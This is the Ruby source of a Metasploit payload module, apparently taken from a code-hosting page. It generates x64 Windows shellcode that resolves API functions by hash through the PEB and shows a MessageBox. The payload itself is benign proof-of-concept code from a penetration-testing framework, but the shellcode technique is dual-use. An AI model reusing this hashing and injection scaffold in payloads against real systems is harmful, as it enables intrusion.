206 lines
5.1 KiB
Ruby
206 lines
5.1 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
module MetasploitModule
|
|
|
|
CachedSize = 322
|
|
|
|
include Msf::Payload::Windows
|
|
include Msf::Payload::Single
|
|
|
|
def initialize(info = {})
|
|
super(merge_info(info,
|
|
'Name' => 'Windows MessageBox x64',
|
|
'Description' => 'Spawn a dialog via MessageBox using a customizable title, text & icon',
|
|
'Author' => [
|
|
'pasta <jaguinaga[at]infobytesec.com>'
|
|
],
|
|
'License' => GPL_LICENSE,
|
|
'Platform' => 'win',
|
|
'Arch' => ARCH_X64
|
|
))
|
|
|
|
icon_opts = ['NO', 'ERROR', 'INFORMATION', 'WARNING', 'QUESTION']
|
|
register_options(
|
|
[
|
|
OptString.new('TITLE', [true, "Messagebox Title", "MessageBox"]),
|
|
OptString.new('TEXT', [true, "Messagebox Text", "Hello, from MSF!"]),
|
|
OptEnum.new('ICON', [true, "Icon type", icon_opts[0], icon_opts])
|
|
]
|
|
)
|
|
end
|
|
|
|
def ror(dword, arg, bits = 32)
|
|
mask = (2**arg) - 1
|
|
mask_bits = dword & mask
|
|
return (dword >> arg) | (mask_bits << (bits - arg))
|
|
end
|
|
|
|
def rol(dword, arg, bits = 32)
|
|
return ror(dword, bits - arg, bits)
|
|
end
|
|
|
|
def hash(msg)
|
|
hash = 0
|
|
msg.each_byte do |c|
|
|
hash = ror(c.ord + hash, 0xd)
|
|
end
|
|
return hash
|
|
end
|
|
|
|
def to_unicode(msg)
|
|
return msg.encode("binary").split('').join("\x00") + "\x00\x00"
|
|
end
|
|
|
|
def api_hash(libname, function)
|
|
return (hash(to_unicode(libname.upcase)) + hash(function)) & 0xffffffff
|
|
end
|
|
|
|
def generate(_opts = {})
|
|
style = 0x00
|
|
case datastore['ICON'].upcase.strip
|
|
# default = NO
|
|
when 'ERROR'
|
|
style = 0x10
|
|
when 'QUESTION'
|
|
style = 0x20
|
|
when 'WARNING'
|
|
style = 0x30
|
|
when 'INFORMATION'
|
|
style = 0x40
|
|
end
|
|
|
|
if datastore['EXITFUNC'].upcase.strip == 'PROCESS'
|
|
exitfunc_asm = %(
|
|
xor rcx,rcx
|
|
mov r10d, #{api_hash('kernel32.dll', 'ExitProcess')}
|
|
call rbp
|
|
)
|
|
elsif datastore['EXITFUNC'].upcase.strip == 'THREAD'
|
|
exitfunc_asm = %(
|
|
mov ebx, #{api_hash('kernel32.dll', 'ExitThread')}
|
|
mov r10d, #{api_hash('kernel32.dll', 'GetVersion')}
|
|
call rbp
|
|
add rsp,0x28
|
|
cmp al,0x6
|
|
jl use_exitthread ; is older than Vista or Server 2003 R2?
|
|
cmp bl,0xe0 ; check if GetVersion change the hash stored in EBX
|
|
jne use_exitthread
|
|
mov ebx, #{api_hash('ntdll.dll', 'RtlExitUserThread')}
|
|
|
|
use_exitthread:
|
|
push 0
|
|
pop rcx
|
|
mov r10d,ebx
|
|
call rbp
|
|
)
|
|
end
|
|
exitfunc = Metasm::Shellcode.assemble(Metasm::X64.new, exitfunc_asm).encode_string
|
|
|
|
payload_asm = %(
|
|
cld
|
|
and rsp,0xfffffffffffffff0
|
|
call start_main
|
|
push r9
|
|
push r8
|
|
push rdx
|
|
push rcx
|
|
push rsi
|
|
xor rdx,rdx
|
|
mov rdx,qword ptr gs:[rdx+0x60]
|
|
mov rdx,qword ptr ds:[rdx+0x18]
|
|
mov rdx,qword ptr ds:[rdx+0x20]
|
|
next_mod:
|
|
mov rsi,qword ptr ds:[rdx+0x50]
|
|
movzx rcx,word ptr ds:[rdx+0x4a]
|
|
xor r9,r9
|
|
loop_modname:
|
|
xor rax,rax
|
|
lodsb
|
|
cmp al,0x61
|
|
jl not_lowercase
|
|
sub al,0x20
|
|
not_lowercase:
|
|
ror r9d,0xd
|
|
add r9d,eax
|
|
loop loop_modname
|
|
push rdx
|
|
push r9
|
|
mov rdx,qword ptr ds:[rdx+0x20]
|
|
mov eax,dword ptr ds:[rdx+0x3c]
|
|
add rax,rdx
|
|
mov eax,dword ptr ds:[rax+0x88]
|
|
test rax,rax
|
|
je get_next_mod1
|
|
add rax,rdx
|
|
push rax
|
|
mov ecx,dword ptr ds:[rax+0x18]
|
|
mov r8d,dword ptr ds:[rax+0x20]
|
|
add r8,rdx
|
|
check_has:
|
|
jrcxz get_next_mod
|
|
dec rcx
|
|
mov esi,dword ptr ds:[r8+rcx*4]
|
|
add rsi,rdx
|
|
xor r9,r9
|
|
loop_funcname:
|
|
xor rax,rax
|
|
lodsb
|
|
ror r9d,0xd
|
|
add r9d,eax
|
|
cmp al,ah
|
|
jne loop_funcname
|
|
add r9,qword ptr ds:[rsp+0x8]
|
|
cmp r9d,r10d
|
|
jne check_has
|
|
pop rax
|
|
mov r8d,dword ptr ds:[rax+0x24]
|
|
add r8,rdx
|
|
mov cx,word ptr ds:[r8+rcx*2]
|
|
mov r8d,dword ptr ds:[rax+0x1c]
|
|
add r8,rdx
|
|
mov eax,dword ptr ds:[r8+rcx*4]
|
|
add rax,rdx
|
|
pop r8
|
|
pop r8
|
|
pop rsi
|
|
pop rcx
|
|
pop rdx
|
|
pop r8
|
|
pop r9
|
|
pop r10
|
|
sub rsp,0x20
|
|
push r10
|
|
jmp rax
|
|
get_next_mod:
|
|
pop rax
|
|
get_next_mod1:
|
|
pop r9
|
|
pop rdx
|
|
mov rdx,qword ptr ds:[rdx]
|
|
jmp next_mod
|
|
start_main:
|
|
pop rbp
|
|
lea rcx,qword ptr ds:[rbp + #{exitfunc.length + datastore['TEXT'].length + datastore['TITLE'].length + 0x105}]
|
|
mov r10d, #{api_hash('kernel32.dll', 'LoadLibraryA')}
|
|
call rbp
|
|
mov r9, #{style}
|
|
lea rdx,qword ptr ds:[rbp + #{exitfunc.length + 0x103}]
|
|
lea r8,qword ptr ds:[rbp + #{exitfunc.length + datastore['TEXT'].length + 0x104}]
|
|
xor rcx,rcx
|
|
mov r10d, #{api_hash('user32.dll', 'MessageBoxA')}
|
|
call rbp
|
|
)
|
|
|
|
payload_data = Metasm::Shellcode.assemble(Metasm::X64.new, payload_asm).encode_string
|
|
payload_data << exitfunc
|
|
payload_data << datastore['TEXT'] + "\x00"
|
|
payload_data << datastore['TITLE'] + "\x00"
|
|
payload_data << "user32.dll" + "\x00"
|
|
|
|
return payload_data
|
|
end
|
|
end
|